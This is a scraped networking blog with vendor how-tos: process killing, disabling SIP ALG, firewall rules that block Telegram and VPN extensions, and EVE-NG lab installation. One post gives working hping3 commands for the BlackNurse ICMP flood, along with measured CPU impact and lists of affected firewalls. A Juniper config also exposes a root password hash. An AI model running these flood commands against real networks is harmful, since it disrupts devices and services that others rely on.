Killing stuck process

Posted in Networking by nbctcp

Arista:

# bash

$ ps –ef | grep -i Stp

$ sudo kill PID

CheckPoint:

http://todorovicmarko.blogspot.co.id/2013/11/troubleshootprocessaplicationgeneralcom.html

ps -auxww Report all active processes in the kernel we can see zombi process with this command (z)

You must first identify the parent process of these zombies;

ps -l -p <pid of zombie>

pidof fwd (splat)

pgrep -l sshd Find the PIDs of processes by (part of) name

ps axjf See in tree format also i can see parent pid )

pmap PID Memory map of process (good for hunting memory leaks)

Displaying the top 10 CPU-consuming processes (% of total usage)

ps aux | head -1; ps aux | sort -rn +2 | head -10

Displaying the processes in order of real memory use

ps vx | head -1 ; ps vx | grep -v PID | sort -rn +6 | head -10

Displaying the processes using whatchdog (CPWD) for (CDP,FWM,FWD)

cpwd_admin list

Firewall/Router Attack – BlackNurse

Posted in Hack/Crack, Networking by nbctcp

SOURCE: blacknurse.dk

This BlackNurse attack will causing high CPU on target device

REQUIREMENT:

-Kali linux

Attack (flood better)

# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 –flood

RESULTS:

-Mikrotik v6.37.1 CPU utilization before attack 4%, after attack 44%

-Fortigate 5.2 CPU utilization before attack idle 99%, after attack idle 70%

This attack only from 1 source. Could be more damage if I am using more attack sources

LIST OF REPORTED AFFECTED PRODUCTS :

-Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings)

-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load

-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)

-Cisco Router 897 – Can be mitigated – The current code from https://www.cymru.com/Documents/secure-ios-template.html will make evil worse.

-Fortinet v5.4.1 – One CPU consumed

-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET

-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO

-Palo Alto 5050 Firewalls with firmware 7.1.4-h2

-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)

-Zyxel NWA3560-N (Wireless attack from LAN Side)

-Zyxel Zywall USG50

NOT AFFECTED:

-AVM Fritz!Box 7360 (common ADSl router in Germany)

-Check Point Security Gateways – Checkpoint response!

-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)

-GigaVUE HC-Serie (Gigamon)

-Iptables

-Juniper SRX

-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/sek) and no problem && RouterOS 5.4 on Mikrotik RB750

-OpenBSD 6.0 and current

-pfSense

-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going

-Windows Firewalls

26Sep2016

How to disable SIP ALG

Posted in VOIP by nbctcp

SOURCE:
http://www.voip-info.org/wiki/view/Routers+SIP+ALG

Many of today’s commercial routers implement SIP ALG (Application-level gateway), coming with this feature enabled by default. While ALG could help in solving NAT related problems, the fact is that many routers’ ALG implementations are wrong and break SIP.

CheckPoint
login to Smart Dashboard
click Smart Defence tab
expand Application Intelligence
expand VoIP
disable all features on H.323

Cisco
(config)# no ip nat service sip tcp port 5060
(config)# no ip nat service sip udp port 5060

ASA
(config)# policy-map global_policy
(config)# no inspect sip

Cyberoam
> cyberoam system_modules sip unload

D-Link
Open a browser and enter the router’s IP address in the address bar. Go to “Firewall Settings” under the “Advanced” item.
Uncheck the box to disable SPI – usually, directly below this item are options for “NAT Endpoint Filtering” that must be changed to “Endpoint Independent” for both TCP and UDP.
Next, find the “Application Level Gateway (ALG) Configuration” area and uncheck the box for SIP.
Save these settings and reboot the device if requested

FortiGate
disable SIP ALG
# config system settings
# set sip-helper disable
# set sip-nat-trace disable
# end
verify
# show full-configuration system settings
delete sip
# config system session-helper
(session-helper) # show
config system session-helper
edit 1
set name pptp
set protocol 6
set port 1723
next
edit 2
set name h323
set protocol 6
set port 1720
next
edit 3
set name ras
set protocol 17
set port 1719
next
edit 4
set name tns
set protocol 6
set port 1521
next
edit 5
set name tftp
set protocol 17
set port 69
next
edit 6
set name rtsp
set protocol 6
set port 554
next
edit 7
set name rtsp
set protocol 6
set port 7070
next
edit 8
set name rtsp
set protocol 6
set port 8554
next
edit 9
set name ftp
set protocol 6
set port 21
next
edit 10
set name mms
set protocol 6
set port 1863
next
edit 11
set name pmap
set protocol 6
set port 111
next
edit 12
set name pmap
set protocol 17
set port 111
next
edit 13
set name sip
set protocol 17
set port 5060
next
edit 14
set name dns-udp
set protocol 17
set port 53
next
edit 15
set name rsh
set protocol 6
set port 514
next
edit 16
set name rsh
set protocol 6
set port 512
next
edit 17
set name dcerpc
set protocol 6
set port 135
next
edit 18
set name dcerpc
set protocol 17
set port 135
next
edit 19
set name mgcp
set protocol 17
set port 2427
next
edit 20
set name mgcp
set protocol 17
set port 2727
next
end
(session-helper) # delete 13
(session-helper) # end

Juniper
https://kb.juniper.net/InfoCenter/index?page=content&id=KB7078&actp=search
# set security alg sip disable
# commit and quit

Mikrotik
> ip firewall service-port set sip disabled=yes

Netgear
From Wan Setup Menu, NAT Filtering, uncheck the box next to “Disable SIP ALG”

PaloAlto
https://live.paloaltonetworks.com/t5/Configuration-Articles/How-to-Disable-SIP-ALG/ta-p/60637
# set shared alg-override application sip alg-disabled yes

Peplink
go to http://<router.LAN.IP>/cgi-bin/MANGA/support.cgi
Click the “Disable” button under “SIP ALG Support”

SonicWall
in GUI, go to VOIP>Settings>General Settings
tick Enable consistent NAT
untick Enable SIP Transformations

SpeedTouch
telnet router
> connection unbind application=SIP port=5060
> saveall

Zyxel
telnet router
Menu option “24. System Maintenance”.
Menu option “8. Command Interpreter Mode”.
ip nat service sip active 0

10Aug2016

PaloAlto UNL Basic config

Posted in Networking by nbctcp

20160809 22.09.jpg

NOTE:

-make sure all nics in UNL vm using vmxnet3 and not e1000

-I feel PA6.1 is more stable than PA7.0.1
-I don’t have URL Filtering license, so I can’t test blocking website

-set PA mgmt nic ip to 192.168.1.1

> configure

# set deviceconfig system ip-address 192.168.1.1 netmask 255.255.255.0

# commit

PC1:

MGMT NIC

ip 192.168.1.10/24

LAN NIC

ip 10.0.0.10/24

gw 10.0.0.1

-open PC1 browser and go to https://192.168.1.1

L: admin

P: admin

set Device/Management section

-set Service Route Configuration

-set Network/Network Profiles/Interface Mgmt

-set Network/Zones

-set Network/Interfaces

-set Network/DHCP

-set Objects/Addresses

-set Policies/Security

-set Policies/NAT

14cf68d6570787bcc52ed77bbd863a68

-click Commit

-click Save

Now you can test whether you can surfing from PC1

29Apr2016

Blocking Browsec Chrome Extension

Posted in Networking, Security by nbctcp

Browsec is VPN extension similar to ZenMate

CheckPoint:

Cisco ASA:

Cyberoam:

Fortigate:

Juniper:

Mikrotik:

/ip firewall address-list

add address=12.12.12.0/24 list=LAN

/ip firewall layer7-protocol

add name=browsec regexp=”^.+(postls.com).*\$”

/ip firewall filter

add action=drop chain=forward layer7-protocol=browsec src-address-list=LAN

PaloAlto:

SonicWall:

29Apr2016

Blocking Opera Turbo

Posted in Networking by nbctcp

CheckPoint:

Cisco ASA:

FortiGate:

Juniper:

Mikrotik:

/ip firewall address-list

add address=12.12.12.0/24 list=LAN

/ip firewall layer7-protocol

add name=opera regexp=”^.+(opera-mini.net).*\$”

/ip firewall filter

add action=drop chain=forward layer7-protocol=opera src-address-list=LAN

PaloAlto:

SonicWall:

29Apr2016

Blocking Telegram

Posted in Networking, Security by nbctcp

Telegram is like WhatsApp that can be downloaded here

https://telegram.org

CheckPoint:

Cisco ASA:

interface Ethernet0

nameif outside

security-level 0

ip address dhcp

interface Ethernet1

nameif inside

security-level 100

ip address 12.12.12.1 255.255.255.0

clock timezone gmt 7

dns domain-lookup outside

dns domain-lookup inside

dns server-group DefaultDNS

name-server 8.8.8.8

name-server 8.8.4.4

object network PAT

subnet 12.12.12.0 255.255.255.0

object network telegram1

subnet 91.108.4.0 255.255.252.0

object network telegram2

subnet 91.108.56.0 255.255.252.0

object network telegram3

subnet 149.154.160.0 255.255.252.0

object network telegram4

subnet 149.154.164.0 255.255.252.0

object network telegram5

subnet 149.154.168.0 255.255.252.0

object network telegram6

subnet 149.154.172.0 255.255.252.0

object-group network objgrp-telegram

network-object object telegram1

network-object object telegram2

network-object object telegram3

network-object object telegram4

network-object object telegram5

network-object object telegram6

access-list LAN extended permit ip any any

access-list acl-telegram extended deny ip any object-group objgrp-telegram

access-list ping extended permit icmp any interface outside

access-list ping extended permit icmp any interface inside

access-list outside_access_out extended deny ip any object-group objgrp-telegram

access-list outside_access_out extended permit ip any any

object network PAT

nat (inside,outside) dynamic interface

access-group outside_access_out out interface outside

access-group LAN in interface inside

route outside 0.0.0.0 0.0.0.0 10.0.10.1 1

user-identity default-domain LOCAL

http server enable

http 10.0.10.0 255.255.255.0 outside

http 12.12.12.0 255.255.255.0 inside

ntp server 180.211.88.211

policy-map global_policy

class inspection_default

inspect dns preset_dns_map

inspect ftp

inspect h323 h225

inspect h323 ras

inspect ip-options

inspect netbios

inspect rsh

inspect rtsp

inspect skinny

inspect esmtp

inspect sqlnet

inspect sunrpc

inspect tftp

inspect sip

inspect xdmcp

inspect icmp

inspect icmp error

FortiGate:

config system interface

edit “port1”

set vdom “root”

set mode dhcp

set allowaccess ping https ssh http fgfm

set type physical

set snmp-index 1

edit “port2”

set vdom “root”

set ip 12.12.12.1 255.255.255.0

set allowaccess ping https ssh fgfm

set type physical

set snmp-index 2

end

config firewall policy

edit 1

set name “PAT”

set uuid 170d4c60-0d49-51e6-102b-cc84e02a9dfb

set srcintf “port2”

set dstintf “port1”

set srcaddr “all”

set dstaddr “all”

set action accept

set schedule “always”

set service “ALL”

set nat enable

edit 2

set name “telegram”

set uuid 0b2d9320-0d5b-51e6-ce90-307685813f39

set srcintf “port2”

set dstintf “port1”

set srcaddr “all”

set dstaddr “telegramgroup”

set schedule “always”

set service “HTTP” “HTTPS”

set logtraffic all

end

config firewall address

edit “telegram”

set uuid 532c2ac0-0d5a-51e6-754f-62c1c2f11af6

set subnet 91.108.4.0 255.255.252.0

edit “telegram2”

set uuid a0149520-0d5a-51e6-b083-9fda96570787

set subnet 91.108.56.0 255.255.252.0

edit “telegram3”

set uuid a0149520-0d5a-51e6-b083-9fda96570787

set subnet 149.154.160.0 255.255.252.0

edit “telegram4”

set uuid a0149520-0d5a-51e6-b083-9fda96570787

set subnet 149.154.164.0 255.255.252.0

edit “telegram5”

set uuid a0149520-0d5a-51e6-b083-9fda96570787

set subnet 149.154.168.0 255.255.252.0

edit “telegram6”

set uuid a0149520-0d5a-51e6-b083-9fda96570787

set subnet 149.154.172.0 255.255.252.0

end

config firewall addrgrp

edit “telegramgroup”

set uuid 72081cc0-0d5e-51e6-f4e3-e05511d7c552

set member “telegram” “telegram2” “telegram3” “telegram4” “telegram5” “telegram6”

end

Juniper:

# show

version 12.1X46-D10.2;

system {

host-name SRX1;

root-authentication {

encrypted-password “$1$htJmWkYL$Dij6D2dwMvBOvSm64mJVt0”; ## SECRET-DATA

}

name-server {

8.8.8.8;

8.8.4.4;

}

services {

ssh;

web-management {

http {

interface ge-0/0/0.0;

}

syslog {

file messages {

any any;

}

license {

autoupdate {

url https://ae1.juniper.net/junos/key_retrieval;

}

interfaces {

ge-0/0/0 {

unit 0 {

family inet {

filter {

input BLOCK-TELEGRAM;

}

dhcp;

}

ge-0/0/1 {

unit 0 {

family inet {

address 12.12.12.1/24;

}

routing-options {

static {

route 0.0.0.0/0 next-hop 10.0.10.1;

}

policy-options {

prefix-list ADDRESSLIST-TELEGRAM {

91.108.4.0/22;

91.108.56.0/22;

149.154.160.0/22;

149.154.164.0/22;

149.154.168.0/22;

149.154.172.0/22;

}

security {

screen {

ids-option untrust-screen {

icmp {

ping-death;

}

ip {

source-route-option;

tear-drop;

}

tcp {

syn-flood {

alarm-threshold 1024;

attack-threshold 200;

source-threshold 1024;

destination-threshold 2048;

queue-size 2000; ## Warning: ‘queue-size’ is deprecated

timeout 20;

}

land;

}

nat {

source {

rule-set PAT {

from zone trust;

to zone untrust;

rule PAT {

match {

source-address 0.0.0.0/0;

destination-address 0.0.0.0/0;

}

then {

source-nat {

interface;

}

policies {

from-zone trust to-zone trust {

policy default-permit {

match {

source-address any;

destination-address any;

application any;

}

then {

permit;

}

from-zone trust to-zone untrust {

policy default-permit {

match {

source-address any;

destination-address any;

application any;

}

then {

permit;

}

from-zone untrust to-zone trust {

policy default-deny {

match {

source-address any;

destination-address any;

application any;

}

then {

deny;

}

zones {

security-zone trust {

tcp-rst;

interfaces {

ge-0/0/1.0;

}

security-zone untrust {

screen untrust-screen;

interfaces {

ge-0/0/0.0 {

host-inbound-traffic {

system-services {

dhcp;

}

firewall {

filter BLOCK-TELEGRAM {

term LIST-TELEGRAM {

from {

source-prefix-list {

ADDRESSLIST-TELEGRAM;

}

then {

discard;

}

term ALLOW-REST {

then accept;

}

Mikrotik:

/ip firewall address-list

add address=12.12.12.0/24 list=LAN

add address=149.154.160.0/22 list=telegram

add address=149.154.164.0 /22 list=telegram

add address=149.154.168.0 /22 list=telegram

add address=149.154.172.0 /22 list=telegram

add address=91.108.4.0/22 list=telegram

add address=91.108.56.0/22 list=telegram

/ip firewall filter

add action=drop chain=forward dst-address-list=telegram src-address-list=LAN

PaloAlto:

SonicWall:

1Mar2016

Blocking ZenMate

Posted in Networking, Security by nbctcp

CheckPoint:

Cisco ASA:

(config)# object-group network zenmate

(config)# network-object host 78.137.98.120

(config)# network-object host 78.137.98.123

(config)# network-object host 162.159.244.96

(config)# network-object host 162.159.245.96

(config)# network-object host 207.244.77.22

(config)# network-object host 103.10.197.146

(config)# network-object host 46.165.220.211

(config)# network-object host 81.17.26.242

(config)# network-object host 149.3.140.250

(config)# access-list acl-inside extended deny ip any object-group zenmate

Cyberoam:

FortiGate:

Juniper:

Mikrotik:

SOURCE: http://askaexpert.blogspot.co.id/2015/05/how-to-block-zenmate-with-mikrotik.html

# export

/ip firewall address-list

add address=12.12.12.0/24 list=LAN

/ip firewall layer7-protocol

add name=zenmate regexp=”^.+(zenguard.biz|zenmate.io|zenguard.zendesk.com|zendesk.com|zenguard.org).*\$”

/ip firewall filter

add action=drop chain=forward disabled=yes layer7-protocol=zenmate src-address-list=LAN

PaloAlto:

SonicWall:

1Mar2016

Blocking YouTube

Posted in Networking, Security by nbctcp

CheckPoint:

Cisco:

FortiGate:

Juniper:

Mikrotik:
/ip firewall layer7-protocol
add name=youtube regexp=”^.+(c.youtube.com|googlevideo.com).*\$”
/ip firewall address-list
add address=12.12.12.0/24 list=LAN
/ip firewall filter
add action=drop chain=forward layer7-protocol=youtube src-address-list=LAN

PaloAlto:

SonicWall:

2Jul2015

Eve-NG Installation on ESXi

Posted in Networking by nbctcp

ESXi:
-check your CPU support virtualization
http://ark.intel.com/Products/VirtualizationTechnology

-check your hardware support virtualization
# esxcfg-info |grep “HV Support”
|—-HV Support……………………………………..3
|—-World Command Line……………………………grep HV Support
0 – VT/AMD-V indicates that support is not available for this hardware.
1 – VT/AMD-V indicates that VT or AMD-V might be available but it is not supported for this hardware.
2 – VT/AMD-V indicates that VT or AMD-V is available but is currently not enabled in the BIOS.
3 – VT/AMD-V indicates that VT or AMD-V is enabled in the BIOS and can be used.

-Edit the VM settings and go to VM settings > Options > CPUID mask > Advanced > Level 1, add the following CPU mask level
ECX —- —- —- —- —- —- –H- —-
NOTE: do above only if all else failed

-Edit the VM settings and go to VM settings > Options > CPU/MMU
Virtualization . Select
“Use Intel VT-x/AMD-V for instruction set virtualization and Intel EPT/AMD RVI for MMU virtualization”

-vm hardware version must be version 9 or above
# vim-cmd vmsvc/getallvms
# vim-cmd vmsvc/upgrade unetlab-vmid vmx-09

-modify /etc/vmware/config
add in the last line then logout and relogin from web gui
vhv.enable = “TRUE”
or better
modify /vmfs/volume/datastore1/UnetLab/UnetLab.vmx
add to the last line
vhv.enable = “TRUE”

-should show “nestedHVSupported true”

# vim-cmd vmsvc/get.capability 8

-test in ubuntu
# egrep -c ‘(vmx|svm)’ /proc/cpuinfo
the output should be 8

-to reconfigure network
# rm -f /opt/ovf/.configured
# exit
and login back

-if sometime you can’t login Web GUI, try this
# /etc/init.d/apache2 restart

Download Unetlab from: http://www.eve-ng.net/index.php/downloads

-check current version

# dpkg -l eve-ng

ii eve-ng 2.0.3-53 amd64 A new generation software for net

# apt autoremove (answer Y)

# apt-get update

# apt-get install eve-ng

# apt-get dist-upgrade (answer Y)

# reboot ( if previous version < V84 )

-check new version

# dpkg -l eve-ng

ii eve-ng 2.0.3-60 amd64 A new generation software for net

-to check what version are you running and what version is the freshest one
# cat /etc/apt/sources.list.d/unetlab.list
deb http://www.unetlab.com/apt trusty rrlabs
# apt-cache policy unetlab
unetlab:
Installed: 0.9.0-96
Candidate: 0.9.0-96
Version table:
*** 0.9.0-96 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
100 /var/lib/dpkg/status
0.9.0-94 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-92 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-88 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-76 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-70 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-68 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages
0.9.0-54 0
500 http://www.unetlab.com/apt/ trusty/rrlabs amd64 Packages

-Below is the reference node in UNL: “/opt/unetlab/html/includes/init.php”
‘a10’ => ‘A10 vThunder’,
‘osx’ => ‘Apple OSX’,
‘clearpass’ => ‘Aruba ClearPass’,
‘aruba’ => ‘Aruba WiFi Controller’,
‘veos’ => ‘Arista vEOS’,
‘barracuda’ => ‘Barraccuda NGIPS’,
‘brocadevadx’ => ‘Brocade vADX’,
‘cpsg’ => ‘CheckPoint Security Gateway VE’,
//’docker’ => ‘Docker.io’,
‘acs’ => ‘Cisco ACS’,
‘ampcloud’ => ‘Cisco AMP Cloud’,
‘asa’ => ‘Cisco ASA’,
‘asav’ => ‘Cisco ASAv’,
‘cda’ => ‘Cisco Context Directory Agent’,
‘csr1000v’ => ‘Cisco CSR 1000V’,
‘csr1000vng’ => ‘Cisco CSR 1000V (Denali and Everest)’,
‘cips’ => ‘Cisco IPS’,
‘cucm’ => ‘Cisco CUCM’,
‘ise’ => ‘Cisco ISE’,
‘c1710’ => ‘Cisco IOS 1710 (Dynamips)’,
‘c3725’ => ‘Cisco IOS 3725 (Dynamips)’,
‘c7200’ => ‘Cisco IOS 7206VXR (Dynamips)’,
‘iol’ => ‘Cisco IOL’,
‘titanium’ => ‘Cisco NX-OSv (Titanium)’,
‘nxosv9k’ => ‘Cisco NX-OSv 9K’,
‘firepower’ => ‘Cisco FirePower’,
‘firepower6’ => ‘Cisco FirePower 6′,
//’ucspe’ => ‘Cisco UCS-PE’,
‘vios’ => ‘Cisco vIOS’,
‘viosl2’ => ‘Cisco vIOS L2’,
‘vnam’ => ‘Cisco vNAM’,
‘vwlc’ => ‘Cisco vWLC’,
‘vwaas’ => ‘Cisco vWAAS’,
‘prime’ => ‘Cisco Prime Infra’,
‘phoebe’ => ‘Cisco Email Security Appliance (ESA)’,
‘coeus’ => ‘Cisco Web Security Appliance (WSA)’,
‘xrv’ => ‘Cisco XRv’,
‘xrv9k’ => ‘Cisco XRv 9000’,
‘nsvpx’ => ‘Citrix Netscaler’,
‘sonicwall’ => ‘Dell SonicWall’,
‘cumulus’ => ‘Cumulus VX’,
‘extremexos’ => ‘ExtremeXOS’,
‘bigip’ => ‘F5 BIG-IP LTM VE’,
‘fortinet’ => ‘Fortinet FortiGate’,
‘huaweiusg6kv’ => ‘Huawei USG6000v’,
‘hpvsr’ => ‘HP VSR1000’,
‘jspace’ => ‘Junos Space’,
‘olive’ => ‘Juniper Olive’,
‘vmx’ => ‘Juniper vMX’,
‘vmxvcp’ => ‘Juniper vMX VCP’,
‘vmxvfp’ => ‘Juniper vMX VFP’,
‘vsrx’ => ‘Juniper vSRX’,
‘vsrxng’ => ‘Juniper vSRX NextGen’,
‘vqfxre’ => ‘Juniper vQFX RE’,
‘vqfxpfe’ => ‘Juniper vQFX PFE’,
‘junipervrr’ => ‘Juniper RR’,
‘linux’ => ‘Linux’,
‘mikrotik’ => ‘MikroTik RouterOS’,
‘timos’ => ‘Nokia 7750 VSR-I’,
‘timoscpm’ => ‘Nokia 7750 CPM’,
‘timosiom’ => ‘Nokia 7750 IOM’,
‘ostinato’ => ‘Ostinato’,
‘paloalto’ => ‘Palo Alto VM-100 Firewall’,
‘pfsense’ => ‘pfSense Firewall’,
‘alteon’ => ‘Radware AlteonVA’,
‘riverbed’ => ‘Riverbed’,
‘sterra’ => ‘S-Terra’,
‘vyos’ => ‘VyOS’,
‘esxi’ => ‘VMWare ESXi’,
‘vcenter’ => ‘VMWare vCenter’,
‘win’ => ‘Windows’,
‘winserver’ => ‘Windows Server’,
‘vpcs’ => ‘Virtual PC (VPCS)’

Qemu folder name EVE	Vendor	Qemu image .qcow2 name
a10-	A10-vthunder	hda
osx-	Apple OSX
clearpass-	Aruba ClearPass	hda
aruba-	Aruba WiFi Controller	hda, hdb
veos	Arista vEOS	hda, cdrom.iso
barracuda-	Barraccuda NGIPS	hda
brocadevadx-	Brocade vADX	virtioa
cpsg-	CheckPoint Security Gateway VE	hda
docker-	Docker.io
acs-	Cisco ACS	hda
ampcloud	Cisco AMP Cloud
asa-	Cisco ASA	hda
asav-	Cisco ASAv	virtioa
cda-	Cisco Context Directory Agent	hda
csr1000v-	Cisco CSR 1000v	virtioa
csr1000vng-	Cisco CSR 1000v (Denali and Everest)	virtioa
cips-	Cisco IPS	hda, hdb
cucm-	Cisco CUCM	virtioa
ise-	Cisco ISE	hda
titanium-	Cisco NX-OSv (Titanium)	virtioa
nxosv9k-	Cisco NX-OSv 9k	hda
firepower-	Cisco FirePower	scsia
firepower6-	Cisco FirePower 6	hda
ucspe	Cisco UCS-PE
vios-	Cisco vIOS	virtioa
viosl2-	Cisco vIOS L2	virtioa
vnam-	Cisco vNAM	hda
vwlc-	Cisco vWLC	megasasa
vwaas-	Cisco vWAAS	virtioa
prime-	Cisco Prime Infra
phoebe-	Cisco Email Security Appliance (ESA)	hda
coeus-	Cisco Web Security Appliance (WSA)	virtioa
xrv-	Cisco XRv	hda
xrv9k-	Cisco XRv 9000	virtioa
nsvpx-	Citrix Netscaler	virtioa
sonicwall-	DELL Sonicwall	hda
cumulus-	Cumulus VX	hda
extremexos-	ExtremeOS	hda
bigip-	F5 BIG-IP LTM VE	hda, hdb
fortinet-	Fortinet FW	virtioa
fortinet-	Fortinet SGT	virtioa
fortinet-	Fortinet mail	virtioa, virtiob
fortinet-	Fortinet manager	virtioa
huaweiusg6kv	Huawei USG6000v
hpvsr-	HP VSR1000	hda
jspace-	Junos Space	hda
olive-	Juniper Olive	hda
vmx-	Juniper vMX	hda
vmxvcp-	Juniper vMXVCP	hda, hdb, hdc
vmxvfp-	Juniper vMXVFP	hda
vsrx-	Juniper vSRX	virtioa
vsrxng-	Juniper vSRX NextGen	hda
vqfxre-	Juniper vQFXRE	hda
vqfxpfe-	Juniper vQFXPFE	hda
junipervrr	Juniper RR
linux-	Linux	hda
mikrotik-	MikroTik RouterOS	hda
timos-	Nokia 7750 VSR-I	hda
timoscpm-	Nokia 7750 CPM
timosiom-	Nokia 7750 IOM
ostinato-	Ostinato traffic generator	hda
paloalto-	Palo Alto VM-100 Firewall	virtioa
pfsense-	pfSense Firewall	hda
alteon-	Radware AlteonVA	virtioa
riverbed-	Riverbed	virtioa, virtiob
sterra-	S-terra VPN	hda
vyos-	VyOS	virtioa
esxi-	VMWare ESXi
vcenter-	VMWare Vcenter
win-	Windows	hda
winserver-	Windows Server	hda
vpcs	Virtual PC (VPCS)

-to install ios image
scp c1710-bk9no3r2sy-mz.124-23.bin, c3725-adventerprisek9-mz.124-15.T14.bin and c7200-adventerprisek9-mz.152-4.S6.bin to /opt/unetlab/addons/dynamips
# cd /opt/unetlab/addons/dynamips
# unzip c1710-bk9no3r2sy-mz.124-23.bin
# unzip c3725-adventerprisek9-mz.124-15.T14.bin
# unzip c7200-adventerprisek9-mz.152-4.S6.bin
# mv C1710-BK.BIN c1710-bk9no3r2sy-mz.124-23.image
# mv C3725-AD.BIN c3725-adventerprisek9-mz.124-15.T14.image
# mv C7200-AD.BIN c7200-adventerprisek9-mz.152-4.S6.image
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install asa
# mkdir -p /opt/unetlab/addons/qemu/asa-8.42
scp ASA-8.42.vmdk and ASA-8.42-0.vmdk into /opt/unetlab/addons/qemu/asa-8.42
# cd /opt/unetlab/addons/qemu/asa-8.42
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ASA-8.42.vmdk hda.qcow2
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ASA-8.42-0.vmdk hdb.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
create two asa node with ram 1024mb
ASA1
# conf t
(config)# hostname asa1
(config)# int e0
(config-if)# ip add 10.0.0.101 255.255.255.0
(config-if)# nameif outside
(config-if)# no sh
ASA2
# conf t
(config)# hostname asa2
(config)# int e0
(config-if)# ip add 10.0.0.102 255.255.255.0
(config-if)# nameif outside
(config-if)# no sh
(config-if)# end
# ping 10.0.0.101# mkdir -p /opt/unetlab/addons/qemu/asa-9.15
scp hda.qcow2 and hdb.qcow2 into /opt/unetlab/addons/qemu/asa-9.15
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
NOTE:
Forum said only asa-9.15 can do Active/Active

-to install a10

# mkdir -p /opt/unetlab/addons/qemu/a10-4.0.1

# scp vThunder-4.0.1.ova into /opt/unetlab/addons/qemu/a10-4.0.1

# cd /opt/unetlab/addons/qemu/a10-4.0.1

# tar xf vThunder-4.0.1.ova

# # /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 vThunder-4.0.1-disk1.vmdk hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install acs
download acs-5.7.0.15.iso
create acs vm in ESXi with 4GB RAM, 2x CPU core, 40GB thin disk, OS Other Linux 64bit
boot acs vm and attach acs-5.7.0.15.iso

after install, reboot and remove detach acs.iso
login: setup
Enter hostname[]: acs
Enter IP address: 10.0.20.86
Enter IP netmask[]: 255.255.255.0
Enter IP default gateway[]: 10.0.20.1
Enter default DNS domain[]: poc.com
Enter primary nameserver[]: 8.8.8.8
Add seconday nameserver? Y/N [N}:
Enter NTP server[time.nist.gov]:
Add another NTP server? Y/N [N]:
Enter system timezone[UTC]: GMT
Enable SSH service? Y/N [N]: y
Enter username[admin]:
Enter password:
Enter password again:shutdown acs vm
ssh as root to unetlab
# mkdir -p /opt/unetlab/addons/qemu/acs-5.7.0.15
ssh as root into ESXi
# cd /vmfs/volume/datastore1/acs
# scp *vmdk root@10.0.20.71:/opt/unetlab/addons/qemu/acs-5.7.0.15
switch to unetlab
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 acs.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install asav

# mkdir -p /opt/unetlab/addons/qemu/asav-932-200

scp asav932-200.qcow2 into /opt/unetlab/addons/qemu/asav-932-200

# cd /opt/unetlab/addons/qemu/asav-932-200

# cp -p asav932-200.qcow2 hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

create asav lab

Make sure console is vnc in unl file.

# cat /opt/unetlab/labs/LAB.unl

logout and relogin from web gui

-to install Aruba CX
# mkdir /opt/unetlab/addons/qemu/aruba-cx-10_02
scp ArubaOS-CX_10_02_0010_ova.zip into /tmp
# cd /tmp
# unzip ArubaOS-CX_10_02_0010_ova.zip
# tar xf ArubaOS-CX_10_02_0010.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 arubaoscx-disk-image-genericx86-p4-20190129201401.vmdk /opt/unetlab/addons/qemu/aruba-cx-10_02/hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
Wipe before Start node
L: admin
P:

-to install Aruba MM
# mkdir /opt/unetlab/addons/qemu/aruba-mm-8.2.0.2
scp ArubaOS_MM_8.2.0.2_62929.ova into /tmp
# cd /tmp
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ArubaOS_MM_8.2.0.2_62929-disk1.vmdk /opt/unetlab/addons/qemu/aruba-mm-8.2.0.2 /hda.qcow2
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ArubaOS_MM_8.2.0.2_62929-disk2.vmdk /opt/unetlab/addons/qemu/aruba-mm-8.2.0.2 /hdb.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
-set 6GB RAM and 3 CPU minimum. NICs must be 3 before turn on

-to install aruba vmc
# mkdir -p /opt/unetlab/addons/qemu/aruba-vmc-8.2.0.2
scp ArubaOS_VMC_8.2.0.2_62929.tar into /tmp
# tar xf ArubaOS_VMC_8.2.0.2_62929.tar
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ArubaOS_VMC_8.2.0.2_62929-disk1.vmdk /opt/unetlab/addons/qemu/aruba-vmc-8.2.0.2/hda.qcow2
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 ArubaOS_VMC_8.2.0.2_62929-disk2.vmdk /opt/unetlab/addons/qemu/aruba-vmc-8.2.0.2/hdb.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install bigip-12.0
download BIGIP-12.0.0.1.0.628.LTM.qcow2.zip from
